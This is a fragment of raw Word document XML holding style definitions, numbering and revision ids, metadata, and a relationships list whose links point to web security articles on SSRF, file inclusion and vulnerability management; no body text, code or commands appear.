    <w:tmpl w:val="C33E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06755"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="003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E080B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D8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81007"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41A6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90179"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43BA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14377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C65C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33DFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B80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15BB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F02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A08F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCD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34AC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="084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437616">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2002539877">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1595936621">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="796214657">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="436339086">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1908539830">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="732243090">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="266429065">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="558243741">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="595140077">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1958948253">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="396125170">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="21826053">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1035621345">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1040520388">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="717314027">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1978870868">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1278411996">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2020767042">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="900751159">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1073549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AE"/>
    <w:rsid w:val="0002655D"/>
    <w:rsid w:val="000F7A6D"/>
    <w:rsid w:val="001E1307"/>
    <w:rsid w:val="00377BAE"/>
    <w:rsid w:val="003A3FE6"/>
    <w:rsid w:val="006A5EB8"/>
    <w:rsid w:val="006A74E5"/>
    <w:rsid w:val="007F2C15"/>
    <w:rsid w:val="00A35AA6"/>
    <w:rsid w:val="00BD3203"/>
    <w:rsid w:val="00F0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E4161"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CCBE315A-6209-43E4-A0F7-58813CB8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BAE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00377B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B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BAE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00377BAE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00377BAE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00377BAE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0037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BAE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00377BAE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F055C5"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F055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eldung.com/cs/author/ndukajohn" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/threat-vs-vulnerability-vs-risk" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/privilege-escalation" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/vulnerability-management-lifecycle-tools-and-best-practices/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/rest-api-testing/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=3dKavgfL2pA" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/category/security" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/device-hardening-security" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/server-side-request-forgery" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/authentication-vs-authorization" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/ssrf-server-side-request-forgery/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/api-security/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/local-file-inclusion-lfi/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/shorts/c214wHJH0Vw" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/zta-zero-trust-architecture" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/learn/application-security/application-security/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/learn/application-security/application-security/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/ws-security/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/vulnerability-examples-common-types-and-5-real-world-examples/"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baeldung.com/cs/tag/security-attacks" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/dos-vs-ddos-attacks" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/7-ssrf-mitigation-techniques-you-must-know/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/file-inclusion-vulnerabilities/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/application-server-vs-web-server" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/api-security/"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www.baeldung.com/cs/editor/milossimic" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/cia-triad" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/firewalls-intro" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/vulnerability-management-lifecycle-tools-and-best-practices/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/local-file-inclusion-lfi/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baeldung.com/cs/siem" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/brightsecurdev/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/vulnerability-testing-methods-tools-and-10-best-practices/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/lfi-attack-real-life-attacks-and-attack-examples/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=ih5R_c16bKc&amp;list=PLuyTk2_mYISIlDtWBIqmgJgn6CYlzHVs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5058</Words>
  <Characters>28833</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>240</Lines>
  <Paragraphs>67</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>33824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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-21T13:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-21T13:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>